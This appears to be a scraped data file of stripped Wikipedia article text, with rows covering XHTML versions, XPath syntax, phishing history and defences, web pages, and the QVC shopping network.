XML. A valid document adheres to the content specification for XHTML, which describes the document structure. The W3C recommends several conventions to ensure an easy migration between HTML and XHTML (see HTML Compatibility Guidelines). The following steps can be applied to XHTML 1.0 documents only: By carefully following the W3C's compatibility guidelines, a user agent should be able to interpret the document equally as HTML or XHTML. For documents that are XHTML 1.0 and have been made compatible in this way, the W3C permits them to be served either as HTML (with a text html MIME type), or as XHTML (with an application xhtml xml or application xml MIME type). When delivered as XHTML, browsers should use an XML parser, which adheres strictly to the XML specifications for parsing the document's contents. HTML 4 defined three different versions of the language: Strict, Transitional (once called Loose), and Frameset. The Strict version is intended for new documents and is considered best practice, while the Transitional and Frameset versions were developed to make it easier to transition documents that conformed to older HTML specifications or did not conform to any specification to a version of HTML 4. The Transitional and Frameset versions allow for presentational markup, which is omitted in the Strict version. Instead, cascading style sheets are encouraged to improve the presentation of HTML documents. Because XHTML 1 only defines an XML syntax for the language defined by HTML 4, the same differences apply to XHTML 1 as well. The Transitional version allows the following parts of the vocabulary, which are not included in the Strict version: The Frameset version includes everything in the Transitional version, as well as the frameset element (used instead of body) and the frame element. In addition to the above transitional differences, the frameset specifications (whether XHTML 1.0 or HTML 4.01) specify a different content model, with frameset replacing body, that contains either frame elements, or optionally noframes with a body. As this list demonstrates, the loose versions of the specification are maintained for legacy support. However, contrary to popular misconceptions, the move to XHTML does not imply a removal of this legacy support. Rather the X in XML stands for extensible and the W3C is modularizing the entire specification and opens it up to independent extensions. The primary achievement in the move from XHTML 1.0 to XHTML 1.1 is the modularization of the entire specification. The strict version of HTML is deployed in XHTML 1.1 through a set of modular extensions to the base XHTML 1.1 specification. Likewise, someone looking for the loose (transitional) or frameset specifications will find similar extended XHTML 1.1 support (much of it is contained in the legacy or frame modules). Modularization also allows for separate features to develop on their own timetable. So for example, XHTML 1.1 will allow quicker migration to emerging XML standards such as MathML (a presentational and semantic math language based on XML) and XForms—a new highly advanced web-form technology to replace the existing HTML forms. In summary, the HTML 4 specification primarily reined in all the various HTML implementations into a single clearly written specification based on SGML. XHTML 1.0, ported this specification, as is, to the new XML-defined specification. Next, XHTML 1.1 takes advantage of the extensible nature of XML and modularizes the whole specification. XHTML 2.0 was intended to be the first step in adding new features to the specification in a standards-body-based approach. The HTML Living Standard, which is developed by WHATWG, is the official version, while W3C HTML5 is no longer separate from WHATWG. There are some WYSIWYG editors (what you see is what you get), in which the user lays out everything as it is to appear in the HTML document using a graphical user interface (GUI), often similar to word processors. The editor renders the document rather than showing the code, so authors do not require extensive knowledge of HTML. The WYSIWYG editing model has been criticized, 96 97 primarily because of the low quality of the generated code; there are voices who? advocating a change to the WYSIWYM model (what you see is what you mean). WYSIWYG editors remain a controversial topic because of their perceived flaws such as: |
55 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/XPath | XPath (XML Path Language) is an expression language designed to support the query or transformation of XML documents. It was defined by the World Wide Web Consortium (W3C) in 1999, 1 and can be used to compute values (e.g., strings, numbers, or Boolean values) from the content of an XML document. Support for XPath exists in applications that support XML, such as web browsers, and many programming languages. The XPath language is based on a tree representation of the XML document, and provides the ability to navigate around the tree, selecting nodes by a variety of criteria. 2 3 In popular use (though not in the official specification), an XPath expression is often referred to simply as "an XPath". Originally motivated by a desire to provide a common syntax and behavior model between XPointer and XSLT, subsets of the XPath query language are used in other W3C specifications such as XML Schema, XForms and the Internationalization Tag Set (ITS). XPath has been adopted by a number of XML processing libraries and tools, many of which also offer CSS Selectors, another W3C standard, as a simpler alternative to XPath. There are several versions of XPath in use. XPath 1.0 was published in 1999, XPath 2.0 in 2007 (with a second edition in 2010), XPath 3.0 in 2014, and XPath 3.1 in 2017. However, XPath 1.0 is still the version that is most widely available. 1 The most important kind of expression in XPath is a location path. A location path consists of a sequence of location steps. Each location step has three components: An XPath expression is evaluated with respect to a context node. An Axis Specifier such as 'child' or 'descendant' specifies the direction to navigate from the context node. The node test and the predicate are used to filter the nodes specified by the axis specifier: For example, the node test 'A' requires that all nodes navigated to must have label 'A'. A predicate can be used to specify that the selected nodes have certain properties, which are specified by XPath expressions themselves. The XPath syntax comes in two flavors: the abbreviated syntax, is more compact and allows XPaths to be written and read easily using intuitive and, in many cases, familiar characters and constructs. The full syntax is more verbose, but allows for more options to be specified, and is more descriptive if read carefully. The compact notation allows many defaults and abbreviations for common cases. Given source XML containing at least the simplest XPath takes a form such as that selects C elements that are children of B elements that are children of the A element that forms the outermost element of the XML document. The XPath syntax is designed to mimic URI (Uniform Resource Identifier) and Unix-style file path syntax. More complex expressions can be constructed by specifying an axis other than the default 'child' axis, a node test other than a simple name, or predicates, which can be written in square brackets after any step. For example, the expression selects the first child ( 1 ), whatever its name, of every B element that itself is a child or other, deeper descendant ( ) of an A element that is a child of the current context node (the expression does not begin with a ). The predicate 1 binds more tightly than the operator. To select the first node selected by the expression A B , write (A B ) 1 . Note also, index values in XPath predicates (technically, 'proximity positions' of XPath node sets) start from 1, not 0 as common in languages like C and Java. In the full, unabbreviated syntax, the two examples above would be written Here, in each step of the XPath, the axis (e.g. child or descendant-or-self) is explicitly specified, followed by :: and then the node test, such as A or node() in the examples above. Here the same, but shorter: A B position() 1 Axis specifiers indicate navigation direction within the tree representation of the XML document. The axes available are: b As an example of using the attribute axis in abbreviated syntax, a href selects the attribute called href in a elements anywhere in the document tree. The expression . (an abbreviation for self::node()) is most commonly used within a predicate to refer to the currently selected node. For example, h3 . 'See also' selects an element called h3 in the current context, whose text content is See also. Node tests may consist of specific node names or more general expressions. In the case of an XML document in which the namespace prefix gs has been defined, gs:enquiry will find all the enquiry elements in that namespace, and gs: will find all elements, regardless of local name, in that namespace. Other node test formats are: Predicates, written as expressions in square brackets, can be used to filter a node-set according to some condition. For example, a returns a node-set (all the a elements which are children of the context node), and a href 'help.php' keeps only those elements having an href attribute with the value help.php. There is no limit to the number of predicates in a step, and they need not be confined to the last step in an XPath. They can also be nested to any depth. Paths specified in predicates begin at the context of the current step (i.e. that of the immediately preceding node test) and do not alter that context. All predicates must be satisfied for a match to occur. When the value of the predicate is numeric, it is syntactic-sugar for comparing against the node's position in the node-set (as given by the function position()). So p 1 is shorthand for p position() 1 and selects the first p element child, while p last() is shorthand for p position() last() and selects the last p child of the context node. In other cases, the value of the predicate is automatically converted to a Boolean. When the predicate evaluates to a node-set, the result is true when the node-set is non-empty clarify . Thus p x selects those p elements that have an attribute named x. A more complex example: the expression a html lang 'en' href 'help.php' 1 target selects the value of the target attribute of the first a element among the children of the context node that has its href attribute set to help.php, provided the document's html top-level element also has a lang attribute set to en. The reference to an attribute of the top-level element in the first predicate affects neither the context of other predicates nor that of the location step itself. Predicate order is significant if predicates test the position of a node. Each predicate takes a node-set returns a (potentially) smaller node-set. So a 1 href 'help.php' will find a match only if the first a child of the context node satisfies the condition href 'help.php', while a href 'help.php' 1 will find the first a child that satisfies this condition. XPath 1.0 defines four data types: node-sets (sets of nodes with no intrinsic order), strings, numbers and Booleans. The available operators are: The function library includes: Some of the more commonly useful functions are detailed below. c Expressions can be created inside predicates using the operators: , , , , and . Boolean expressions may be combined with brackets () and the Boolean operators and and or as well as the not() function described above. Numeric calculations can use , , , div and mod. Strings can consist of any Unicode characters. item price 2 discount selects items whose price attribute is greater than twice the numeric value of their discount attribute. Entire node-sets can be combined ('unioned') using the vertical bar character . Node sets that meet one or more of several conditions can be found by combining the conditions inside a predicate with 'or'. v x or y w z will return a single node-set consisting of all the v elements that have x or y child-elements, as well as all the w elements that have z child-elements, that were found in the current context. Given a sample XML document The XPath expression selects name attributes for all projects, and selects all editions of all projects, and selects addresses of all English Wikimedia projects (text of all edition elements where language attribute is equal to English). And the following selects addresses of all Wikipedias (text of all edition elements that exist under project element with a name attribute of Wikipedia). The Java package javax.xml.xpath has been part of Java standard edition since Java 5 8 via the Java API for XML Processing. Technically this is an XPath API rather than an XPath implementation, and it allows the programmer the ability to select a specific implementation that conforms to the interface. XPath is increasingly used to express constraints in schema languages for XML. |
56 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Phishing | Phishing is a form of social engineering and a scam where attackers deceive people into revealing sensitive information 1 or installing malware such as viruses, worms, adware, or ransomware. Phishing attacks have become increasingly sophisticated and often transparently mirror the site being targeted, allowing the attacker to observe everything while the victim navigates the site, and transverses any additional security boundaries with the victim. 2 As of 2020, it is the most common type of cybercrime, with the FBI's Internet Crime Complaint Center reporting more incidents of phishing than any other type of computer crime. 3 The term "phishing" was first recorded in 1995 in the cracking toolkit AOHell, but may have been used earlier in the hacker magazine 2600. 4 5 6 It is a variation of fishing and refers to the use of lures to "fish" for sensitive information. 5 7 8 Measures to prevent or reduce the impact of phishing attacks include legislation, user education, public awareness, and technical security measures. 9 The importance of phishing awareness has increased in both personal and professional settings, with phishing attacks among businesses rising from 72% in 2017 to 86% in 2020. 10 Phishing attacks, often delivered via email spam, attempt to trick individuals into giving away sensitive information and or login credentials. Most attacks are "bulk attacks" that are not targeted and are instead sent in bulk to a wide audience. 11 The goal of the attacker can vary, with common targets including financial institutions, email and cloud productivity providers, and streaming services. 12 The stolen information or access may be used to steal money, install malware, or spear phish others within the target organization. 5 Compromised streaming service accounts may also be sold on darknet markets. 13 This type of social engineering attack can involve sending fraud emails or messages that appear to be from a trusted source, such as a bank or government agency. These messages typically redirect to a fake login page where the user is prompted to enter their login credentials. Spear phishing is a targeted phishing attack that uses personalized emails 14 to trick a specific individual or organization into believing they are legitimate. It often utilizes personal information about the target to increase the chances of success. 15 16 17 18 These attacks often target executives or those in financial departments with access to sensitive financial data and services. Accountancy and audit firms are particularly vulnerable to spear phishing due to the value of the information their employees have access to. 19 The Russian government run Threat Group 4127 (Fancy Bear) (GRU Unit 26165) targeted Hillary Clinton's 2016 presidential campaign with spear phishing attacks on over 1,800 Google accounts, using the accounts-google.com domain to threaten targeted users. 20 21 A study on spear phishing susceptibility among different age groups found that 43% of youth aged 18 25 and 58% of older users clicked on simulated phishing links in daily emails over 21 days. Older women had the highest susceptibility, while susceptibility in young users declined over the study, but remained stable in older users. 22 Whaling attacks use spear phishing techniques to target senior executives and other high-profile individuals 23 with customized content, often related to a subpoena or customer complaint. 24 CEO fraud involves sending fake emails from senior executives to trick employees into sending money to an offshore account. 25 It has a low success rate, but can result in organizations losing large sums of money. 26 Clone phishing is a type of attack where a legitimate email with an attachment or link is copied and modified to contain malicious content. The modified email is then sent from a fake address made to look like it's from the original sender. The attack may appear to be a resend or update of the original email. It often relies on the sender or recipient being previously hacked so the attacker can access the legitimate email. 27 28 Voice over IP (VoIP) is used in vishing or voice phishing attacks, 29 where attackers make automated phone calls to large numbers of people, often using text-to-speech synthesizers, claiming fraudulent activity on their accounts. The attackers spoof the calling phone number to appear as if it is coming from a legitimate bank or institution. The victim is then prompted to enter sensitive information or connected to a live person who uses social engineering tactics to obtain information. 29 Vishing takes advantage of the public's lower awareness and trust in voice telephony compared to email phishing. 30 SMS phishing 31 or smishing 32 33 is a type of phishing attack that uses text messages from a cell phone or smartphone to deliver a bait message. 34 The victim is usually asked to click a link, call a phone number, or contact an email address provided by the attacker. They may then be asked to provide private information, such as login credentials for other websites. The difficulty in identifying illegitimate links can be compounded on mobile devices due to the limited display of URLs in mobile browsers. 35 Smishing can be just as effective as email phishing, as many smartphones have fast internet connectivity. Smishing messages may also come from unusual phone numbers. 36 Page hijacking involves redirecting users to malicious websites or exploit kits through the compromise of legitimate web pages, often using cross site scripting. Hackers may insert exploit kits such as MPack into compromised websites to exploit legitimate users visiting the server. Page hijacking can also involve the insertion of malicious inline frames, allowing exploit kits to load. This tactic is often used in conjunction with watering hole attacks on corporate targets. 37 Calendar phishing involves sending fake calendar invitations with phishing links. These invitations often mimic common event requests and can easily be added to calendars automatically. 38 To protect against this form of fraud, former Google click fraud czar Shuman Ghosemajumder recommends changing calendar settings to not automatically add new invitations. 39 QR codes have been used maliciously in phishing attacks. 40 The term "quishing" involves deceiving individuals into thinking a QR code is harmless while the true intent is malicious, aiming to access sensitive information. 40 Cybercriminals exploit the trust placed in QR codes, particularly on mobile phones, which are more vulnerable to attacks compared to desktop operating systems. 40 Quishing attacks often involve sending QR codes via email, enticing users to scan them to verify accounts, leading to potential device compromise. 40 Malicious QR codes can be stickers covering authentic ones at payment terminals in the street, they can also be printed on fake flyers or fake restaurant menus with enticing discounts, or embedded in videos. 41 They can even be printed on parking tickets placed under cars' windshield wiper. 41 It is advised to exercise caution and avoid scanning QR codes unless the source is verified, 40 that it is not a sticker on top of another sticker, and to also check the destination page's URL. 41 Phishing attacks often involve creating fake links that appear to be from a legitimate organization. 42 These links may use misspelled URLs or subdomains to deceive the user. In the following example URL, http: www.yourbank.example.com , it can appear to the untrained eye as though the URL will take the user to the example section of the yourbank website; actually this URL points to the "yourbank" (i.e. phishing subdomain) section of the example website (fraudster's domain name). Another tactic is to make the displayed text for a link appear trustworthy, while the actual link goes to the phisher's site. To check the destination of a link, many email clients and web browsers will show the URL in the status bar when the mouse is hovering over it. However, some phishers may be able to bypass this security measure. 43 Internationalized domain names (IDNs) can be exploited via IDN spoofing 44 or homograph attacks 45 to allow attackers to create fake websites with visually identical addresses to legitimate ones. These attacks have been used by phishers to disguise malicious URLs using open URL redirectors on trusted websites. 46 47 48 Even digital certificates, such as SSL, may not protect against these attacks as phishers can purchase valid certificates and alter content to mimic genuine websites or host phishing sites without SSL. 49 When publishing hyperlinks on websites, a programmer or contributor may accidentally mistype the intended URL. The link they create may, by chance, point to a never-registered domain. This creates a phantom domain, which is a never-registered domain with preexisting active inbound links from other websites. By analyzing crawls of the web, an attacker can detect these hijackable hyperlinks and purchase the phantom domains they point to, spoofing the expected web site to phish information from users. Research published at The Web Conference 2024 shows 572,000 .com phantom domains exist with inbound links coming from a wide variety of sources, including large organizations and governments. 50 Phishers have sometimes used images instead of text to make it harder for anti-phishing filters to detect the text commonly used in phishing emails. 51 In response, more sophisticated anti-phishing filters are able to recover hidden text in images using optical character recognition (OCR). 52 Phishing often uses social engineering techniques to trick users into performing actions such as clicking a link or opening an attachment, or revealing sensitive information. It often involves pretending to be a trusted entity and creating a sense of urgency, 53 like threatening to close or seize a victim's bank or insurance account. 54 An alternative technique to impersonation-based phishing is the use of fake news articles to trick victims into clicking on a malicious link. These links often lead to fake websites that appear legitimate, 55 but are actually run by attackers who may try to install malware or present fake "virus" notifications to the victim. 56 Early phishing techniques can be traced back to the 1990s, when black hat hackers and the warez community used AOL to steal credit card information and commit other online crimes. The term "phishing" is said to have been coined by Khan C. Smith, a well-known spammer and hacker, 57 and its first recorded mention was found in the hacking tool AOHell, which was released in 1995. AOHell allowed hackers to impersonate AOL staff and send instant messages to victims asking them to reveal their passwords. 58 59 In response, AOL implemented measures to prevent phishing and eventually shut down the warez scene on their platform. 60 61 In the 2000s, phishing attacks became more organized and targeted. The first known direct attempt against a payment system, E-gold, occurred in June 2001, and shortly after the September 11 attacks, a "post 9 11 id check" phishing attack followed. 62 The first known phishing attack against a retail bank was reported in September 2003. 63 Between May 2004 and May 2005, approximately 1.2 million computer users in the United States suffered losses caused by phishing, totaling approximately US$929 million. 64 Phishing was recognized as a fully organized part of the black market, and specializations emerged on a global scale that provided phishing software for payment, which were assembled and implemented into phishing campaigns by organized gangs. 65 66 The United Kingdom banking sector suffered from phishing attacks, with losses from web banking fraud almost doubling in 2005 compared to 2004. 67 68 In 2006, almost half of phishing thefts were committed by groups operating through the Russian Business Network based in St. Petersburg. 69 Email scams posing as the Internal Revenue Service were also used to steal sensitive data from U.S. taxpayers. 70 Social networking sites are a prime target of phishing, since the personal details in such sites can be used in identity theft; 71 In 2007, 3.6 million adults lost US$3.2 billion due to phishing attacks. 72 The Anti-Phishing Working Group reported receiving 115,370 phishing email reports from consumers with US and China hosting more than 25% of the phishing pages each in the third quarter of 2009. 73 Phishing in the 2010s saw a significant increase in the number of attacks. In 2011, the master keys for RSA SecurID security tokens were stolen through a phishing attack. 74 75 Chinese phishing campaigns also targeted high-ranking officials in the US and South Korean governments and military, as well as Chinese political activists. 76 77 According to Ghosh, phishing attacks increased from 187,203 in 2010 to 445,004 in 2012. In August 2013, Outbrain suffered a spear-phishing attack, 78 and in November 2013, 110 million customer and credit card records were stolen from Target customers through a phished subcontractor account. 79 CEO and IT security staff subsequently fired. 80 In August 2014, iCloud leaks of celebrity photos were based on phishing e-mails sent to victims that looked like they came from Apple or Google. 81 In November 2014, phishing attacks on ICANN gained administrative access to the Centralized Zone Data System; also gained was data about users in the system - and access to ICANN's public Governmental Advisory Committee wiki, blog, and whois information portal. 82 Fancy Bear was linked to spear-phishing attacks against the Pentagon email system in August 2015, 83 84 and the group used a zero-day exploit of Java in a spear-phishing attack on the White House and NATO. 85 86 Fancy Bear carried out spear phishing attacks on email addresses associated with the Democratic National Committee in the first quarter of 2016. 87 88 In August 2016, members of the Bundestag and political parties such as Linken-faction leader Sahra Wagenknecht, Junge Union, and the CDU of Saarland were targeted by spear-phishing attacks suspected to be carried out by Fancy Bear. In August 2016, the World Anti-Doping Agency reported the receipt of phishing emails sent to users of its database claiming to be official WADA, but consistent with the Russian hacking group Fancy Bear. 89 90 91 In 2017, 76% of organizations experienced phishing attacks, with nearly half of the information security professionals surveyed reporting an increase from 2016. In the first half of 2017, businesses and residents of Qatar were hit with over 93,570 phishing events in a three-month span. 92 In August 2017, customers of Amazon faced the Amazon Prime Day phishing attack, when hackers sent out seemingly legitimate deals to customers of Amazon. When Amazon's customers attempted to make purchases using the "deals", the transaction would not be completed, prompting the retailer's customers to input data that could be compromised and stolen. 93 In 2018, the company block.one, which developed the EOS.IO blockchain, was attacked by a phishing group who sent phishing emails to all customers aimed at intercepting the user's cryptocurrency wallet key, and a later attack targeted airdrop tokens. 94 Phishing attacks have evolved in the 2020s to include elements of social engineering, as demonstrated by the July 15, 2020, Twitter breach. In this case, a 17 year-old hacker and accomplices set up a fake website resembling Twitter's internal VPN provider used by remote working employees. Posing as helpdesk staff, they called multiple Twitter employees, directing them to submit their credentials to the fake VPN website. 95 Using the details supplied by the unsuspecting employees, they were able to seize control of several high-profile user accounts, including those of Barack Obama, Elon Musk, Joe Biden, and Apple Inc.'s company account. The hackers then sent messages to Twitter followers soliciting Bitcoin, promising to double the transaction value in return. The hackers collected 12.86 BTC (about $117,000 at the time). 96 There are anti-phishing websites which publish exact messages that have been recently circulating the internet, such as FraudWatch International and Millersmiles. Such sites often provide specific details about the particular messages. 97 98 As recently as 2007, the adoption of anti-phishing strategies by businesses needing to protect personal and financial information was low. 99 Now there are several different techniques to combat phishing, including legislation and technology created specifically to protect against phishing. These techniques include steps that can be taken by individuals, as well as by organizations. Phone, web site, and email phishing can now be reported to authorities, as described below. Effective phishing education, including conceptual knowledge 100 and feedback, 101 102 is an important part of any organization's anti-phishing strategy. While there is limited data on the effectiveness of education in reducing susceptibility to phishing, 103 much information on the threat is available online. 54 Simulated phishing campaigns, in which organizations test their employees' training by sending fake phishing emails, are commonly used to assess their effectiveness. One example is a study by the National Library of Medicine, in which an organization received 858,200 emails during a 1 month testing period, with 139,400 (16%) being marketing and 18,871 (2%) being identified as potential threats. These campaigns are often used in the healthcare industry, as healthcare data is a valuable target for hackers. These campaigns are just one of the ways that organizations are working to combat phishing. 104 To avoid phishing attempts, people can modify their browsing habits 105 and be cautious of emails claiming to be from a company asking to "verify" an account. It's best to contact the company directly or manually type in their website address rather than clicking on any hyperlinks in suspicious emails. 106 Nearly all legitimate e-mail messages from companies to their customers contain an item of information that is not readily available to phishers. Some companies, for example PayPal, always address their customers by their username in emails, so if an email addresses the recipient in a generic fashion ("Dear PayPal customer") it is likely to be an attempt at phishing. 107 Furthermore, PayPal offers various methods to determine spoof emails and advises users to forward suspicious emails to their spoof PayPal.com domain to investigate and warn other customers. However it is unsafe to assume that the presence of personal information alone guarantees that a message is legitimate, 108 and some studies have shown that the presence of personal information does not significantly affect the success rate of phishing attacks; 109 which suggests that most people do not pay attention to such details. Emails from banks and credit card companies often include partial account numbers, but research 110 has shown that people tend to not differentiate between the first and last digits. This is an issue because the first few digits are often the same for all clients of a financial institution. A study on phishing attacks in game environments found that educational games can effectively educate players against information disclosures and can increase awareness on phishing risk thus mitigating risks. 111 This an example of how users can be trained through game based models. The Anti-Phishing Working Group, one of the largest anti-phishing organizations in the world, produces regular report on trends in phishing attacks. 112 Google posted a video demonstrating how to identify and avoid phishing scams. 113 A wide range of technical approaches are available to prevent phishing attacks reaching users or to prevent them from successfully capturing sensitive information. Specialized spam filters can reduce the number of phishing emails that reach their addressees' inboxes. These filters use a number of techniques including machine learning 114 and natural language processing approaches to classify phishing emails, 115 116 and reject email with forged addresses. 117 Another popular approach to fighting phishing is to maintain a list of known phishing sites and to check websites against the list. One such service is the Safe Browsing service. 118 Web browsers such as Google Chrome, Internet Explorer 7, Mozilla Firefox 2.0, Safari 3.2, and Opera all contain this type of anti-phishing measure. 119 120 121 122 123 Firefox 2 used Google anti-phishing software. Opera 9.1 uses live blacklists from Phishtank, cyscon and GeoTrust, as well as live whitelists from GeoTrust. Some implementations of this approach send the visited URLs to a central service to be checked, which has raised concerns about privacy. 124 According to a report by Mozilla in late 2006, Firefox 2 was found to be more effective than Internet Explorer 7 at detecting fraudulent sites in a study by an independent software testing company. 125 An approach introduced in mid 2006 involves switching to a special DNS service that filters out known phishing domains: this will work with any browser, 126 and is similar in principle to using a hosts file to block web adverts. To mitigate the problem of phishing sites impersonating a victim site by embedding its images (such as logos), several site owners have altered the images to send a message to the visitor that a site may be fraudulent. The image may be moved to a new filename and the original permanently replaced, or a server can detect that the image was not requested as part of normal browsing, and instead send a warning image. 127 128 The Bank of America website 129 130 is one of several that asks users to select a personal image (marketed as SiteKey) and displays this user-selected image with any forms that request a password. Users of the bank's online services are instructed to enter a password only when they see the image they selected. However, several studies suggest that few users refrain from entering their passwords when images are absent. 131 132 In addition, this feature (like other forms of two-factor authentication) is susceptible to other attacks, such as those suffered by Scandinavian bank Nordea in late 2005, 133 and Citibank in 2006. 134 A similar system, in which an automatically generated "Identity Cue" consisting of a colored word within a colored box is displayed to each website user, is in use at other financial institutions. 135 Security skins 136 137 are a related technique that involves overlaying a user-selected image onto the login form as a visual cue that the form is legitimate. Unlike the website-based image schemes, however, the image itself is shared only between the user and the browser, and not between the user and the website. The scheme also relies on a mutual authentication protocol, which makes it less vulnerable to attacks that affect user-only authentication schemes. Still another technique relies on a dynamic grid of images that is different for each login attempt. The user must identify the pictures that fit their pre-chosen categories (such as dogs, cars and flowers). Only after they have correctly identified the pictures that fit their categories are they allowed to enter their alphanumeric password to complete the login. Unlike the static images used on the Bank of America website, a dynamic image-based authentication method creates a one-time passcode for the login, requires active participation from the user, and is very difficult for a phishing website to correctly replicate because it would need to display a different grid of randomly generated images that includes the user's secret categories. 138 Several companies offer banks and other organizations likely to suffer from phishing scams round-the-clock services to monitor, analyze and assist in shutting down phishing websites. 139 Automated detection of phishing content is still below accepted levels for direct action, with content-based analysis reaching between 80% and 90% of success 140 so most of the tools include manual steps to certify the detection and authorize the response. 141 Individuals can contribute by reporting phishing to both volunteer and industry groups, 142 such as cyscon or PhishTank. 143 Phishing web pages and emails can be reported to Google. 144 145 Solutions have also emerged using the mobile phone 146 (smartphone) as a second channel for verification and authorization of banking transactions. Organizations can implement two factor or multi-factor authentication (MFA), which requires a user to use at least 2 factors when logging in. (For example, a user must both present a smart card and a password). This mitigates some risk, in the event of a successful phishing attack, the stolen password on its own cannot be reused to further breach the protected system. However, there are several attack methods which can defeat many of the typical systems. 147 MFA schemes such as WebAuthn address this issue by design. Organizations that prioritize security over convenience can require users of its computers to use an email client that redacts URLs from email messages, thus making it impossible for the reader of the email to click on a link, or even copy a URL. While this may result in an inconvenience, it does almost eliminate email phishing attacks. An article in Forbes in August 2014 argues that the reason phishing problems persist even after a decade of anti-phishing technologies being sold is that phishing is "a technological medium to exploit human weaknesses" and that technology cannot fully compensate for human weaknesses. 148 149 Organizational responses Scholars have found that the investment into both technological and organizational factors can impact protection against phishing. The studies found that organizations can improve their technical education of employees if they include socio-technical factors in their training. 150 On January 26, 2004, the U.S. Federal Trade Commission filed the first lawsuit against a Californian teenager suspected of phishing by creating a webpage mimicking America Online and stealing credit card information. 151 Other countries have followed this lead by tracing and arresting phishers. A phishing kingpin, Valdir Paulo de Almeida, was arrested in Brazil for leading one of the largest phishing crime rings, which in two years stole between US$18 million and US$37 million. 152 UK authorities jailed two men in June 2005 for their role in a phishing scam, 153 in a case connected to the U.S. Secret Service Operation Firewall, which targeted notorious "carder" websites. 154 In 2006, Japanese police arrested eight people for creating fake Yahoo Japan websites, netting themselves 100 million (US$870,000) 155 and the FBI detained a gang of sixteen in the U.S. and Europe in Operation Cardkeeper. 156 Senator Patrick Leahy introduced the Anti-Phishing Act of 2005 to Congress in the United States on March 1, 2005. This bill aimed to impose fines of up to $250,000 and prison sentences of up to five years on criminals who used fake websites and emails to defraud consumers. 157 In the UK, the Fraud Act 2006 158 introduced a general offense of fraud punishable by up to ten years in prison and prohibited the development or possession of phishing kits with the intention of committing fraud. 159 Companies have also joined the effort to crack down on phishing. On March 31, 2005, Microsoft filed 117 federal lawsuits in the U.S. District Court for the Western District of Washington. The lawsuits accuse "John Doe" defendants of obtaining passwords and confidential information. March 2005 also saw a partnership between Microsoft and the Australian government teaching law enforcement officials how to combat various cyber crimes, including phishing. 160 Microsoft announced a planned further 100 lawsuits outside the U.S. in March 2006, 161 followed by the commencement, as of November 2006, of 129 lawsuits mixing criminal and civil actions. 162 AOL reinforced its efforts against phishing 163 in early 2006 with three lawsuits 164 seeking a total of US$18 million under the 2005 amendments to the Virginia Computer Crimes Act, 165 166 and Earthlink has joined in by helping to identify six men subsequently charged with phishing fraud in Connecticut. 167 In January 2007, Jeffrey Brett Goodin of California became the first defendant convicted by a jury under the provisions of the CAN-SPAM Act of 2003. He was found guilty of sending thousands of emails to AOL users, while posing as the company's billing department, which prompted customers to submit personal and credit card information. Facing a possible 101 years in prison for the CAN-SPAM violation and ten other counts including wire fraud, the unauthorized use of credit cards, and the misuse of AOL's trademark, he was sentenced to serve 70 months. Goodin had been in custody since failing to appear for an earlier court hearing and began serving his prison term immediately. 168 169 170 171 |
57 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Web_page | A web page (or webpage) is a document on the Web that is accessed in a web browser. 1 A website typically consists of many web pages linked together under a common domain name. The term "web page" is thus a metaphor of paper pages bound together into a book. Each web page is identified by a distinct Uniform Resource Locator (URL). When the user inputs a URL into their web browser, the browser retrieves the necessary content from a web server and then transforms it into an interactive visual representation on the user's screen. 2 If the user clicks or taps a link, the browser repeats this process to load the new URL, which could be part of the current website or a different one. The browser has features, such as the address bar, that indicate which page is displayed. A web page is a structured document. The core element is a text file written in the HyperText Markup Language (HTML). This specifies the content of the page, 3 including images and video. Cascading Style Sheets (CSS) specify the presentation of the page. 3 CSS rules can be in separate text files or embedded within the HTML file. The vast majority 4 of pages have JavaScript programs, enabling a wide range of behavior. 3 The newer WebAssembly language can also be used as a supplement. 5 The most sophisticated web pages, known as web apps, combine these elements in a complex manner. From the perspective of server-side website deployment, there are two types of web pages: static and dynamic. Static pages are retrieved from the web server's file system without any modification, 6 while dynamic pages must be created by the server on the fly, typically reading from a database to fill out a template, before being sent to the user's browser. 7 An example of a dynamic page is a search engine results page. |
58 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/QVC | QVC (short for "Quality Value Convenience") is an American free-to-air television network and a flagship shopping channel specializing in televised home shopping, owned by Qurate Retail Group. Founded in 1986 by Joseph Segel in West Chester, Pennsylvania, United States, QVC broadcasts to more than 350 million households in seven countries, including channels in the UK, Germany, Japan, and Italy, along with a joint venture in China with China National Radio called CNR Mall. 2 As of December 2013, Halo2Cloud holds the networks record for most units sold in a day of 380,000 chargers with total sales reaching $19 million. 3 QVC was founded on June 13, 1986, by Joseph Segel and investors including Ralph Roberts, the founder and chairperson of Comcast. Roberts was able to arrange deals in which cable companies received investment stakes in QVC in exchange for carrying the channel. 1 Sears was one of the first brands that QVC would represent, with a two-year exclusive agreement to sell Sears products through television shopping. 4 5 The corporation later set a new record for first full-year fiscal sales for a new public company of $112 million. 6 The channel was launched on November 24, 1986, with program hosts Kathy Levine, John Eastman, Ellen Langas, Bob Bowersox, and Cindy Briggs-Moore. 7 Each November 24, QVC celebrated their birthday annually through 2008. 8 9 Initially broadcasting live from 7:30 p.m. until midnight ET each weekday and 24 hours a day each weekend, the channel extended its live programming to 24 7 364 in January 1987. Former QUBE host and producer, Ron Giles, was named an executive vice president and executive producer at QVC in late 1987. 10 In October 1988, the board of directors elected Michael C. Boyd to the position of senior executive vice president and chief operating officer. 11 In early 1990, Boyd would take the title of president, reportedly to relieve some of Segel's load. 12 In July 1989, QVC acquired the Cable Value Network, founded by Irwin L. Jacobs. The $380 million deal contributed to a loss of $17 million during the next fiscal quarter, and then led to difficulties in the couple of years that followed. 13 14 15 QVC first offered to buy out the Burbank-based Shop Television Network on March 16, 1991, 16 a bid rejected by its producers and the Los Angeles Superior Court, and which carried blocks of time offering JCPenney merchandise. On May 21, 1991, it acquired the channel and its 4 million subscribers, with a liability of $2 million to its producers, along with a license to carry JCPenney brands on-air. 17 A QVC offer to buy rival Home Shopping Network in March 1992 was sidetracked by antitrust concerns. 18 On July 12, 1993, QVC offered to acquire Home Shopping in a stock swap valued at about $1.1 billion, but talks faltered when QVC pursued a bid for Paramount in fall 1993. 19 Liberty Media Corp. held a controlling interest in the St. Petersburg, Florida-based Home Shopping Network along with their share of QVC. 20 Introduced to televised shopping by designer Diane von F rstenberg a decade before their marriage, Fox founder Barry Diller pursued slick "infotainment" style programming as his next television venture. 21 After resigning as chairman of Fox Inc. in early 1992, Diller's Arrow Investments purchased a $25 million 